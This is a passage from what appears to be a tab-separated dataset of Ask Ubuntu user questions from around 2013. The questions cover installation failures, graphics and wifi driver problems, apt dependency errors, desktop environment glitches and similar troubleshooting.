jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0019v0000p0003e0000-e0,1 , k8e , ramlsfw ' ) 2013-05-26 09:57:30,977 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0000v0000p0000e0000-e0,5 , kramlsfw6,8 , ' ) 2013-05-26 09:57:30,978 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'input : b0019v0000p0005e0000-e0,5 , kramlsfw0 , ' ) 2013-05-26 09:57:30,978 debug : querying driver db < jockey.detection.openprintingdriverdb instance at 0x92e68cc > about hardwareid ( 'modalias ' , 'wmi:466747a0-70ec-11de-8a39-0800200c9a66 ' ) 2013-05-26 09:57:57,347 warning : modinfo for module cedarview_gfx failed : error : modinfo : could not find module cedarview_gfx 2013-05-26 09:57:57,348 warning : /sys/module/cedarview_gfx/drivers does not exist , can not rebind cedarview_gfx driver how can i fix this ? i know that the netbook has integrated graphic card .
300211	12.04 lts installation process suddenly stops	i plan to install ubuntu 12.04.2 lts alongside windows 7 in asus a43e series and i had an unsuccessful experience about the installation . here is the chronology : i installed ubuntu via usb stick . while the 3 options appear , i select the 1st which is `` install inside windows 7 '' , but the process suddenly stopped . the next instruction was to remove the installation media and press the `` enter '' button which i did , but windows 7 appeared not ubuntu . then i try another media , the dvd instead of the usb stick and i had the same result . please help .
300215	kde wo n't see the shortcuts/widgets from other partitions/hard disks	i was using ubuntu default until yesterday when i installed kde to try it out and i kind of like it , it 's very customizable , but there 's one problem ... i added 3 other desktops in order to set up 4 of them total , each with a different wallpaper and for different environments ( fun , work/study , etc etc ) .on the second desktop i 've set up a `` folder view '' panel to a folder on another partition of the same hard disk on which ubuntu is installed . the thing is that when i restart the computer , the panel says that the folders do n't exist at the location where it should be , but it actually exists there.if i go to the settings there and i select `` specify folder '' and re-select the folder , it re-appears , without me modifying the path or anything ( it actually is already selected when i enter the settings , but i need to re-click on it to re-appear ) . the same thing happens with my hard disk shortcuts on the first desktop page , if i click on them , i get an error saying that they do n't exist , but they do . if i select the file manager and click on the hard disk from there , it recognizes them without problem ... and after i do that , the hard disk shortcuts are also recognized . is there a way for me to solve this and not having to re-enter all hard disks and enter the setup of the `` folder view '' on the second desktop all the time ?
300217	unity does n't show up	unity does n't show up in my hp pavilion . does anyone know how to fix this ?
300224	is it normal when installing de 's , the boot up screen changes ?	( de 's = desktop environments . ) i was looking for a lightweight de , when i started thinking about xubuntu . i installed it , and i had to reboot my asus eee laptop because of updates . when it booted up , there was a xubuntu bootup screen . is that normal ?
300225	installation of wifi drivers	i use a toshiba satellite l755 . how do i download and install wifi drivers . please i am new to ubuntu . thanks
300236	gnome shell extensions wo n't install from website	i am not new to ubuntu , i have been using it for about 4 years now , but just recently ( a couple weeks ago ) upgrade from 10.10 to 12.04 , and so i am new to this new gnome shell idea , and the extensions as well . i have been playing with it for hours now and am enjoying thoroughly so far , but what is really bothering me and has been pestering me is that i am unable to install new shell extensions from https : //extensions.gnome.org/ . the problem is that i visit the site , view the extension i would like to install , so i click the little install switch from off to on , and i even get the prompt asking if i would like to install the extension , and so i click install , and then it says the extension is on , but if i click the installed extensions link , the extension i just âinstalledâ does not show up , nor does it in my gnome-tweak-tool . i have gnome-tweak-tool installed , i have even uninstalled and reinstalled hoping for results , but it was unsuccessful . i also have gnome-shell installed , i have version 3.5.4 . i have tried many things to fix this problem , such as restarting my shell after installing them , and i also have the shell extensions in the tweak tool installed , but have had no results in resolving this problem . i have read many post , threads , forums and tried all the proposed solutions with no luck , maybe i am overlooking something silly and small , but i dont think thats the case . if anybody has any ideas i would much appreciate them and be open to them ! thanks and i am booted up into the regular gnome , not classic , as i have noticed that was the problem for many . i have also tried installing the extensions with chrome and firefox , and have gone to the about : plugins on both and made sure that the gnome shell integration is enabled , i have disabled and enabled it again , without any success .
300239	deja dup does not ask for password for ftp , cifs , webdav or ssh	i 'd like to backup my $ home to my local nas using cifs ( `` samba '' , `` windows '' ) , webdav , ssh or ftp . i do n't care which one ( or should i care ? my nas ( synology ds212 ) supports all ) . i 've made somce screenshots available ; they might help to understand what i did . at least i hope so… ☺ in the déjà dup settings , i entered the details as shown on the screenshot ; it translates to the following custom location : ftp : //a @ 172.17.2.3:21/home/sicherung/dejadup when i then try to start a backup , i just see a screen which says : backup location not available waiting for a network connection … what i 'm missing is the prompt for the password . is that the issue ? the directory /home/sicherung/dejadup exists on my local ftp server 172.17.2.3 for my user a ; see this screenshot of the ftp session on my pictures . thanks , alexander
300241	installed nvidia driver from website and now ubuntu wo n't even start up	installed nvidia driver from website and now ubuntu wo n't even start up . just a black screen with a flashing cursor . i did a boot-repair but did nothing ? very frustrating . any solutions or is it still a problem ? thanks
300242	problem with hdmi on ubuntu 12.04	i 've a problem with hdmi on my ultrabook . one week ago it worked fine but now there is a problem . when i connect it , ubuntu recognize the monitor-tv but it 's black/blank , no image will display . someone can help me ? thanks
300247	error during startup	i just installed ubuntu 13.04 ( 32 bit ) alongside windows xp and getting error `` try ( hd0,0 ) : fat 32 : '' while starting please provide me a solution
300254	how to configure postfix to test site on lamp virtualhost ?	i want to test e-mail functions of php forum script . i installed lamp , postfix . how to configure postfix to test e-mail from site on localhost ?
300256	my package system is broken . changing folder name fixed it ( libjack )	check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f apt-get install -f gives me reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : kde-l10n-engb kde-l10n-zhcn use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libjack-jackd2-0 suggested packages : jackd2 the following packages will be upgraded : libjack-jackd2-0 1 upgraded , 0 newly installed , 0 to remove and 46 not upgraded . 1 not fully installed or removed . need to get 0 b/197 kb of archives . after this operation , 3,072 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 632520 files and directories currently installed . ) preparing to replace libjack-jackd2-0 1.9.8~dfsg.1-1ubuntu2 ( using ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ) ... unpacking replacement libjack-jackd2-0 ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) details from package manager : the following packages have unmet dependencies : libjack-jackd2-0 : depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu10.4 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is installed libjack-jackd2-0 : i386 : depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10.4 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is installed i changed /usr/share/doc/libjack-jackd2-0/ to /usr/share/doc/libjack-jackd2-0.old/ and apt-get install -f gave me : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : kde-l10n-engb kde-l10n-zhcn use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libjack-jackd2-0 suggested packages : jackd2 the following packages will be upgraded : libjack-jackd2-0 1 upgraded , 0 newly installed , 0 to remove and 46 not upgraded . 1 not fully installed or removed . need to get 0 b/197 kb of archives . after this operation , 3,072 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 632520 files and directories currently installed . ) preparing to replace libjack-jackd2-0 1.9.8~dfsg.1-1ubuntu2 ( using ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ) ... unpacking replacement libjack-jackd2-0 ... setting up libjack-jackd2-0 ( 1.9.8~dfsg.2-1precise1 ) ... setting up libjack-jackd2-0 : i386 ( 1.9.8~dfsg.2-1precise1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place now all is good . why ?
300264	software suggestion for drawing common tangent	i have a set of data . ( when plotted looks like following ) i need to find out the x and y coordinates of the points where the common tangent touches the curve . which free software on ubuntu can help me to get the coordinates of the points where the common tangent touches the curve ?
300269	update : failed to lock /var/cache/apt/archives/lock	i am running the upgrade ( 12.10 to 13.04 ) through terminal and it keeps getting stuck at this : failed to lock /var/cache/apt/archives/lock what do i do ? i have root access . i have no idea what else to try other than a clean install . checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes do you want to start the upgrade ? 3 packages are going to be removed . 155 new packages are going to be installed . 1204 packages are going to be upgraded . you have to download a total of 595 m. this download will take about 1 hour 15 minutes with a 1mbit dsl connection and about 23 hours with a 56k modem . fetching and installing the upgrade can take several hours . once the download has finished , the process can not be canceled . continue [ yn ] details [ d ] y fetching could not download the upgrades the upgrade has aborted . please check your internet connection or installation media and try again . all files downloaded so far have been kept . failed to lock /var/cache/apt/archives/lock restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done root @ chaitanya-xps-ubuntu : ~ #
300271	why `postgresql` package is not listed when executing `apt-cache search postgresql` ?	i just had to install postgresql server on my machine so i did : apt-cache search postgresql and it listed a bunch of packages related to postgresql : [ ... ] postgis - geographic objects support for postgresql -- common files postgresql-8.4 - object-relational sql database , version 8.4 server postgresql-9.1-debversion - debian version number type for postgresql postgresql-9.1-ip4r - ipv4 and ipv4 range index types for postgresql 9.1 postgresql-9.1-orafce - oracle support functions for postgresql 9.1 [ ... ] postgresql-server-dev-8.4 - development files for postgresql 8.4 server-side programming postgresql-server-dev-all - extension build tool for multiple postgresql versions proftpd-mod-pgsql - versatile , virtual-hosting ftp daemon - postgresql module ptop - postgresql performance monitoring tool akin to top [ ... ] however , the actual postgresql package was n't listed although it exists . $ apt-cache show postgresql package : postgresql priority : optional section : database installed-size : 63 maintainer : martin pitt < martin.pitt @ ubuntu.com > original-maintainer : martin pitt < mpitt @ debian.org > architecture : all source : postgresql-common ( 129ubuntu1 ) version : 9.1+129ubuntu1 depends : postgresql-9.1 filename : pool/main/p/postgresql-common/postgresql_9.1+129ubuntu1_all.deb size : 5552 md5sum : 0bee83a4dab3e1d236fb4de1abcbf5c2 sha1 : f58d51b7f855c10959078b6ed8c3ea22dd3293ac sha256 : ec0a12dabb52fee21f8576d5bd0990df6827e551dcd9b24f950d3ca4564d2761 description-en : object-relational sql database ( supported version ) this metapackage always depends on the currently supported postgresql database server version . . postgresql is a fully featured object-relational database management system . it supports a large part of the sql standard and is designed to be extensible by users in many aspects . some of the features are : acid transactions , foreign keys , views , sequences , subqueries , triggers , user-defined types and functions , outer joins , multiversion concurrency control . graphical user interfaces and bindings for many programming languages are available as well . description-md5 : bdff2d6e5b2a1dd00e72b3ed8729d9ac bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu supported : 5y task : postgresql-server package : postgresql priority : optional section : database installed-size : 63 maintainer : martin pitt < martin.pitt @ ubuntu.com > original-maintainer : martin pitt < mpitt @ debian.org > architecture : all source : postgresql-common ( 129 ) version : 9.1+129 depends : postgresql-9.1 filename : pool/main/p/postgresql-common/postgresql_9.1+129_all.deb size : 5508 md5sum : 1ea1455e036c0a058145f19c6e92ef3f sha1 : 8e73a616a686ec1130dc01858ee07e7ce8eb1caa sha256 : a21adb533516e79145d93d57279db69260e644d259c39bb06f7e17d26721ac4b description-en : object-relational sql database ( supported version ) this metapackage always depends on the currently supported postgresql database server version . . postgresql is a fully featured object-relational database management system . it supports a large part of the sql standard and is designed to be extensible by users in many aspects . some of the features are : acid transactions , foreign keys , views , sequences , subqueries , triggers , user-defined types and functions , outer joins , multiversion concurrency control . graphical user interfaces and bindings for many programming languages are available as well . description-md5 : bdff2d6e5b2a1dd00e72b3ed8729d9ac bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu supported : 5y task : postgresql-server i was able to find it by googling how to install postgresql on ubuntu ( apt-get install postgresql ) but i am still wondering why it was not listed by apt-cache search .
300272	apt-get upgrade issues	i 'm having an issue upgrading here are some of reports sudo apt-get upgrade errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-44-generic-pae_3.2.0-44.69_i386.deb server @ philo : / $ sudo apt-get upgrade -f the following new packages will be installed : linux-image-3.2.0-44-generic-pae e : internal error , no file name for libssl1.0.0 so i tried this ... server @ philo : /mnt/halftb/media/videos $ sudo dpkg -- configure -a errors were encountered while processing : linux-image-generic-pae heres a ton of output ... ( reading database ... 80098 files and directories currently installed . ) unpacking linux-image-3.2.0-44-generic-pae ( from ... /linux-image-3.2.0-44-generic-pae_3.2.0-44.69_i386.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-44-generic-pae_3.2.0-44.69_i386.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.2.0-44-generic-pae ' : no space left on device no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-44-generic-pae /boot/vmlinuz-3.2.0-44-generic-pae run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-44-generic-pae /boot/vmlinuz-3.2.0-44-generic-pae preparing to replace libssl1.0.0 1.0.1-4ubuntu5.8 ( using ... /libssl1.0.0_1.0.1-4ubuntu5.9_i386.deb ) ... unpacking replacement libssl1.0.0 ... errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-44-generic-pae_3.2.0-44.69_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) server @ philo : /mnt/halftb/media/videos $ sudo apt-get upgrade -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following new packages will be installed : linux-image-3.2.0-44-generic-pae the following packages will be upgraded : aptitude bash-completion cifs-utils cups cups-bsd cups-client cups-common cups-ppdc libasound2 libcups2 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsmime1 libcupsppdc1 libdrm-intel1 libdrm-nouveau1a libdrm-radeon1 libdrm2 libgnutls26 libtiff4 linux-image-generic-pae linux-libc-dev openssl python-apt python-apt-common rsyslog smbfs 28 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0 b/46.8 mb of archives . after this operation , 113 mb of additional disk space will be used . do you want to continue [ y/n ] ? y e : internal error , no file name for libssl1.0.0 server @ philo : /mnt/halftb/media/videos $ sudo dpkg -- configure -a setting up libssl1.0.0 ( 1.0.1-4ubuntu5.9 ) ... dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-43-generic-pae ; however : package linux-image-3.2.0-43-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured setting up linux-libc-dev ( 3.2.0-43.68 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : linux-image-generic-pae server @ philo : /mnt/halftb/media/videos $ edits- additional : server @ philo : ~ $ sudo apt-get install libssl1.0.0 [ sudo ] password for server : reading package lists ... done building dependency tree reading state information ... done libssl1.0.0 is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-generic-pae : depends : linux-image-3.2.0-43-generic-pae but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
300273	nvidia optimus / purple screen at boot	i have a thinkpad t430 with an nvidia nvs 5400m dual booting raring and windows 8 . if i boot directly into ubuntu or reboot ubuntu then the system boots with a purple screen directly after grub . it 's still responsive in the background as i can reboot using ctrl-alt-delete . if boot into windows 8 and then reboot , the system boots into ubuntu just fine . i 've tried a number of different options in grub : nomodeset , nox2apic , etc . and these do n't seem to make a difference . i 've also tried different combinations in the bios for discrete vs. integrated graphics and optimus detection . i assume there 's something that windows 8 is triggering in the card that 's getting it in the right state to boot . any ideas , similar experiences ... or even a solution ?
300274	how to uninstall ubuntu without bootable cd	i have installed ubuntu using a bootable cd , is there any way to uninstall ubuntu without cd . also , i am not getting an option for ubuntu in add/remove programmes
300275	no launcher or menu in ubuntu 12.10	i am not very good with ubuntu as of yet so i would appreciate an oversimplified explanation of the answer if anyone has one . i have ubuntu 12.10 and have not updated or tried to update in a while but one day when i logged in i was only greeted with my desktop background and shortcuts . there was no launcher on the left or menu at the top . i logged in with the gnome interface and that work fine but the unity desktop has major issues ! please help ?
300280	how to add launcher to global menu bar	im coming from linux mint . i installed ubuntu 13.04 but the first thing i noticed is that when i tried to add the launcher of terminal or other application it is not adding that launcher to global menu . does any know how to do this
300284	no wireless networks detected since latest kernel upgrades	unable to detect wireless network since kernel 3.2.0-41 . problem began immediately following kernel upgrade lspci -nn |grep 0280 03:00.0 network controller [ 0280 ] : broadcom corporation bcm43227 802.11b/g/n [ 14e4:4358 ] sudo modprobe wl fatal : module wl not found . fatal : error running install command for wl sudo lshw -c network *-network description : ethernet interface product : netlink bcm57785 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : dc:0e : a1:96:10:9d size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=sb ip=192.168.1.3 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory : c0430000-c043ffff memory : c0440000-c044ffff memory : c0450000-c04507ff *-network unclaimed description : network controller product : bcm43227 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0500000-c0503fff iwconfig lo no wireless extensions . eth0 no wireless extensions . rfkill list all 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no uname -a linux james-aspire-5750z 3.2.0-44-generic-pae # 69-ubuntu smp thu may 16 18:50:07 utc 2013 i686 i686 i386 gnu/linux apt-cache policy bcmwl-kernel-source bcmwl-kernel-source : installed : 6.20.155.1+bdcom-0ubuntu0.0.1 candidate : 6.20.155.1+bdcom-0ubuntu0.0.1 version table : *** 6.20.155.1+bdcom-0ubuntu0.0.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/restricted i386 packages 100 /var/lib/dpkg/status 5.100.82.38+bdcom-0ubuntu6 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/restricted i386 packages lsmod module size used by usbmouse 12666 0 usbhid 41937 0 hid 77428 1 usbhid dm_crypt 22528 1 snd_hda_codec_hdmi 31775 1 snd_hda_codec_realtek 174313 1 snd_hda_intel 32719 3 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel joydev 17393 0 snd_hwdep 13276 1 snd_hda_codec snd_pcm 80916 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51592 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq snd 62218 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd uvcvideo 67203 0 videodev 86588 1 uvcvideo mei 36570 0 snd_page_alloc 14108 2 snd_hda_intel , snd_pcm acer_wmi 23612 0 sparse_keymap 13658 1 acer_wmi i2c_i801 17346 0 psmouse 86520 0 serio_raw 13027 0 rfcomm 38139 0 pcspkr 12614 0 bnep 17830 2 evbug 12581 0 bluetooth 158479 10 rfcomm , bnep parport_pc 32114 0 mac_hid 13077 0 ppdev 12849 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp sdhci_pci 18324 0 sdhci 28241 1 sdhci_pci tg3 141414 0 i915 428014 3 drm_kms_helper 45466 1 i915 drm 197641 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 wmi 18744 1 acer_wmi video 19115 1 i915 please advise . : ) thanks !
300298	inlcuding subtitle when converting mts to mkv	i want to convert my .mts videos from my sony hd cam into a .mkv . i am using ffmpeg and it works fine . but i have problems with the subtitles ( in this case the subtitles are date and time ) because they get lost once i convert the mts into mkv . i use this command : ffmpeg -i 00235.mts -scodec copy -acodec copy -vcodec copy -f matroska output.mkv this is the output : ffmpeg version 0.8.6-4:0.8.6-0ubuntu0.12.04.1 , copyright ( c ) 2000-2013 the libav developers built on apr 2 2013 17:02:36 with gcc 4.6.3 *** this program is deprecated *** this program is only provided for compatibility and will be removed in a future release . please use avconv instead . input # 0 , mpegts , from '00235.mts ' : duration : 00:00:22.07 , start : 1.000011 , bitrate : 26285 kb/s program 1 stream # 0.0 [ 0x1011 ] : video : h264 ( high ) , yuv420p , 1920x1080 [ par 1:1 dar 16:9 ] , 50 fps , 50 tbr , 90k tbn , 100 tbc stream # 0.1 [ 0x1100 ] : audio : ac3 , 48000 hz , 5.1 , s16 , 448 kb/s stream # 0.2 [ 0x1200 ] : data : [ 144 ] [ 0 ] [ 0 ] [ 0 ] / 0x0090 output # 0 , matroska , to 'output.mkv ' : metadata : encoder : lavf53.21.1 stream # 0.0 : video : h264 / 0x34363248 , yuv420p , 1920x1080 [ par 1:1 dar 16:9 ] , q=2-31 , 1k tbn , 50 tbc stream # 0.1 : audio : ac3 , 48000 hz , 5.1 , 448 kb/s stream mapping : stream # 0.0 - > # 0.0 stream # 0.1 - > # 0.1 press ctrl-c to stop encoding frame= 1104 fps= 0 q=-1.0 lsize= 67284kb time=22.08 bitrate=24963.2kbits/s video:66061kb audio:1208kb global headers:0kb muxing overhead 0.023045 % it looks like stream # 0.2 [ 0x1200 ] is the subtitle but in the end its not put into the mkv . i hope someone can help me .
300300	intel hd 3000 'gen6+ requires kernel 3.6 or later . ' ubuntu 12.04 kernel 3.5	i have a core i5 with an intel hd 3000 , and i use ubuntu 12.04 x64 with kernel 3.5.0-18 , and ppa xorg-edgers for video drivers . and i think after last update , apps are crashing a lot : vlc wo n't play videos , minecraft wo n't run , netflix with modified wine wo n't run either . even glxinfo or glxgears wo n't run . here 's the console output : glxinfo name of display : :0.0 gen6+ requires kernel 3.6 or later . glxinfo : ../../../../../src/mesa/main/context.c:1545 : _mesa_make_current : assertion `newctx- > version > 0 ' failed . aborted ( core dumped ) glxgears gen6+ requires kernel 3.6 or later . glxgears : ../../../../../src/mesa/main/context.c:1545 : _mesa_make_current : assertion `newctx- > version > 0 ' failed . aborted ( core dumped ) if you need more info , like that core dump , just tell me where to find it and i post it here . so should i update my kernel to a newer one , wait for a driver update , or change video driver ?
300304	wireless disconnects when power management enabled on rt3090 wireless 802.11n 1t/1r pcie	my wireless disconnects ( randomly , but i 'm sure it 's when power saving kicks in ) whenever power management is enabled . the only thing that keeps it from happening is to keeping the wifi power management = off , adding the file : â/etc/pm/power.d/wirelessâ # ! /bin/sh /sbin/iwconfig wlan1 power off is there a right way or correct way of taking care of this problem without disabling power management ?
300305	visiting url ( newegg ) causes ubuntu to crash and logout	for some reason ubuntu crashes / logout when i go to newegg . i do n't think it 's a newegg-specific problem , because it only happens in chrome ( firefox works ) and i 've had a similar problem when using plex . i would click on the plex media manager icon , which i believe just opens a browser to a local address , and the computer would crash back to the log-in screen . the behavior is the same in both cases .
300306	installation problem acer 5050	my acer 5050 does n't reboot with ubuntu after the cd 's installation . it continues with the windows xp . do i have to restart always with the cd in the unit ? thank you .
300308	ubuntu laggy response over time 64bit	hello everyone here are my specs : i7 2600 intel cpu asus p8p67 motherboard 8gb ram kingston ocz agility 240gb ssd 1tb seagate hdd 7200rpm 800w corsair psu evga nvidia gtx680 2gb i am running on an asus 27inch 2560x1440p monitor . i have windows 7 running on my seagate hdd . i installed 64 bit 13.04 ubuntu on the ssd . grub allows me to choose between the two and that is working fine . ubuntu runs very well when i start using it . but then over time the performance starts to deteriorate . so when i am typing this out now it lags , when i grab a window and move it around it lags . so there seems to be a delay to my actions . if i reboot and log in again it runs fine but then the same problem occurs . if i leave idle for an hour and come back performance suffers ? i installed the latest nvidia drivers thinking it may of fixed the problem . to me it seems like some sort of bottlenecking occurs over time ? i check the ram and processes and nothing looks out of the ordinary , any ideas ? thanks
300309	counter strike 1.6 - linux client - lag spikes	i 'm having this issue while playing cs 1.6 , everything is working well , my ping is normally below 30ms , but every 2 or 3 minutes a huge lag spike affects me , and my ping starts jumping from 30ms to 400ms and back and forth for about 5 / 10 seconds until il stabilizes again . anyone have any idea what it might be causing it ? my hardware information : processor information : vendor : genuineintel speed : 2399 mhz 4 logical processors / 4 physical processors hyperthreading : unsupported fcmov : supported sse2 : supported sse3 : supported / ssse3 : supported / sse4a : unsupported / sse41 : unsupported / sse42 : unsupported network information : network speed : wifi 54mbps - ( fiber connection 50 mbps down / 10 mbps up ) operating system version : ubuntu 13.04 ( 32 bit ) kernel name : linux kernel version : 3.8.0-22-generic x server : vendor : the x.org foundation release : 11204000 manager : compiz steam runtime version : steam-runtime-release-i386_2013-05-08 video card : driver : ati technologies inc. ati radeon hd 4800 series driver version : 3.3.11672 compatibility profile context desktop color depth : 24 bits per pixel monitor refresh rate : 60 hz vendorid : 0x1002 deviceid : 0x9442 number of monitors : 1 number of logical video cards : 1 primary display resolution : 1280 x 1024 desktop resolution : 1280 x 1024 primary display size : 13,31 '' x 10,63 '' ( 17,01 '' diag ) 33,8cm x 27,0cm ( 43,2cm diag ) * primary vram not detected sound card : audio device : realtek alc662 rev1 memory : ram : 4033 mb miscellaneous : ui language : english en_gb.utf-8 microphone : not set total hard disk space available : 29148 mb largest free hard disk block : 18924 mb installed software : recent failure reports :
300313	how to execute a terminal command at boot	what i want to do is get this custom screen resolution with xrandr to run at every boot so i do n't have to enter it myself or copy and past it this is the code i want to run at every boot cvt 800 600 60 & & xrandr -- newmode `` 800x600_60.00 '' 38.25 800 832 912 1024 600 603 607 624 -hsync +vsync & & xrandr -- addmode tv1 800x600_60.00 & & xrandr -- output tv1 -- mode 800x600_60.00 i do n't really want to play around editing configure/files just a nice easy script that will execute after or during every boot .
300317	which of these network interfaces is my wireless ?	since i upgrade to 12.04 i can not seem to find wlan0 anymore for my wifi network interface . here is a snapshot of my interfaces after typing ifconfig and iwconfig into the terminal . if anybody could quickly tell me which one is my wireless interface is i would much appreciate it . i am trying to set up hostapd .
300320	what does the alt hud do ? 12.04	i have done some searching around and cant seem to find an answer , i see many posts about how to disable the option but im just trying to figure out what its suppose to be used for . just to be clear im talking about when you press alt and get a pop up that says type your command . at first i thought it was easy access terminal but this doesnt seem to be the case .
300322	install from ubuntu software centre to a location of my choice	i need to ensure that when i download from ubuntu software centre , i do so on a self-made partition , and not in the home folder . this applies only to applications and games . is this possible ? [ this may be a basic issue , but i found no easily accessible answer for the same . ]
300324	amd mobility radeon fglrx will not work	i have a big issue here i have a amd mobility radeon hd 4225/4250 and when install the fglrx and i reboot it wont show the whole unity desktop like no launcher and no upper bar , i have ubuntu 13.04 and its like fresh and brand new and its fully up to date . please assist me
300325	privacy settings icon not visible in gnome 3.8	in my settings menu of ubuntu-gnome , gnome 3.8.2 , i do not have a icon for privacy settings . i however would like to access the privacy settings ... how can i do this ? -- edit -- i still would like an answer , and yes of course i searched for `` privacy '' in the search box ; - )
300326	any way to get sublime text to save settings files without running as sudo	i installed sublime text 2 the following way , but what i do not like about it is that i have to run it as sudo to save the user settings files . any ways around this ? thanks , colin sudo add-apt-repository ppa : webupd8team/sublime-text-2 sudo apt-get update sudo apt-get install sublime-text
300327	glxinfo and steam detecting incorrect video driver ( ubuntu 12.04 )	i 've asked for help on the steam discussion boards and on the steam github bug page and i was told to ask about this issue on an ubuntu forum . here are the links : https : //github.com/valvesoftware/steam-for-linux/issues/2516 http : //steamcommunity.com/app/221410/discussions/5/828939797039531960/ anyways , i compiled a custom 3.7.9 kernel a long time ago because i was having issues with my laptop ( closing the lid made the screen permanently black , keyboard did n't light up , no hibernation , etc ) . the 3.7.9 kernel fixed all of these issues and everything has been running a whole lot smoother ever since . unfortunately , the nvidia drivers from jockey did not work . i do n't remember the reason ; it was a long time ago . i downloaded and installed the 310.32 driver manually from nvidia 's website . i had to manually patch the installer because my kernel was too new , but other than that everything seems to have installed fine . tail -n 21 /var/log/nvidia-installer.log - > installing both new and classic tls opengl libraries . - > installing classic tls 32bit opengl libraries . - > install nvidia 's 32-bit compatibility opengl libraries ? ( answer : yes ) - > searching for conflicting x files : - > done . - > searching for conflicting opengl files : - > done . - > installing 'nvidia accelerated graphics driver for linux-x86_64 ' ( 310.32 ) : executing : '/sbin/ldconfig ' ... executing : '/sbin/depmod -aq ' ... - > done . - > driver file installation is complete . - > running post-install sanity check : - > done . - > post-install sanity check passed . - > shared memory test passed . - > running runtime sanity check : - > done . - > runtime sanity check passed . - > would you like to run the nvidia-xconfig utility to automatically update your x configuration file so that the nvidia x driver will be used when you restart x ? any pre-existing x configuration file will be backed up . ( answer : yes ) - > your x configuration file has been successfully updated . installation of the nvidia accelerated graphics driver for linux-x86_64 ( version : 310.32 ) is now complete . as shown in the links i provided at the top , the nvidia x server settings and my xorg.conf seem okay . now for the problem , glxinfo displays this : glxinfo | grep -i opengl 